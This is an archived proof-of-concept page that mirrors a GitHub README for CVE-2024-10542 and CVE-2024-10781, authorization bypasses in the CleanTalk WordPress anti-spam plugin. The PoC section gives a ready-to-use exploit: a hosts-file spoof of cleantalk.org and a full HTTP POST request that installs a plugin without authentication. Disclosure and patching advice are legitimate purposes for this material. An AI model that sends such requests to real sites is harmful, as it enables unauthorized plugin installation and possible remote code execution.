Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-10542 PoC — WordPress plugin Spam protection, Anti-Spam, FireWall by CleanTalk 安全漏洞

Source
https://github.com/ubaydev/CVE-2024-10542
Associated Vulnerability
Title:WordPress plugin Spam protection, Anti-Spam, FireWall by CleanTalk 安全漏洞 (CVE-2024-10542)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Spam protection, Anti-Spam, FireWall by CleanTalk 6.43.2版本及之前版本存在安全漏洞。攻击者利用该漏洞可以远程执行代码。
Description
WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 is vulnerable to Unauthenticated Arbitrary Plugin Installation
Readme
## Poc Of CVE-2024-10542 and CVE-2024-10781 Broken Authentication in Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2

### Disclaimer:
The information provided in this document regarding for CVE-2024-10542 is for learning and educational purposes only. We do not encourage or authorize the use of this information for any detrimental purposes, including but not limited to exploitation, system tampering, or other illegal activities.

### Introduction:
In an increasingly complex digital landscape, ensuring the security of websites is paramount for many site owners. Recently, two critical vulnerabilities have been discovered that pose a significant threat to WordPress sites. These vulnerabilities affect the well-known CleanTalk plugin, which provides spam protection, anti-spam measures, and a firewall. What makes this situation even more urgent? Let’s delve deeper!
Two vulnerabilities tracked as CVE-2024-10542 and CVE-2024-10781 could allow unauthenticated attackers to install and activate malicious plugins on susceptible sites. This not only jeopardizes the site's reputation but also opens the door for attackers to execute remote code. With a CVSS score of 9.8 out of 10, it’s evident that these vulnerabilities fall into the highly dangerous category. According to Wordfence, both vulnerabilities concern an authorization bypass issue that could allow a malicious actor to install and activate arbitrary plugins. This could then pave the way for remote code execution if the activated plugin is vulnerable of its own.

### PoC:
first of all malicious users will set their hosts file on their operating systems:
```
127.0.0.1 cleantalk.org
```
after which they sent a request like this
```txt
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct
```

### Conclusion:
Cybersecurity is a responsibility shared by every site owner. By keeping plugins up to date and remaining vigilant about potential vulnerabilities, we can protect our sites from malicious attacks. Make sure you have updated CleanTalk to the latest version and conduct routine checks on other plugins to ensure maximum security. Remember, small steps can prevent significant disasters!

### Reference:
- [https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html](https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html)
- [https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability](https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability)
- [https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation)
- [https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631](https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631)

### Buy me a coffe:
- [https://saweria.co/ubaii](https://saweria.co/ubaii)
- [https://buymeacoffee.com/ubaii](https://buymeacoffee.com/ubaii)
- [https://trakteer.id/ubaii](https://trakteer.id/ubaii)

### Thanks To:
Allah, Muhammad SAW, mikemyers, Markdown Monster, my family, you?
File Snapshot

 [4.0K]  /data/pocs/cad792a1ad767abb7d5929208b7db28213c44ee3
└── [4.2K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.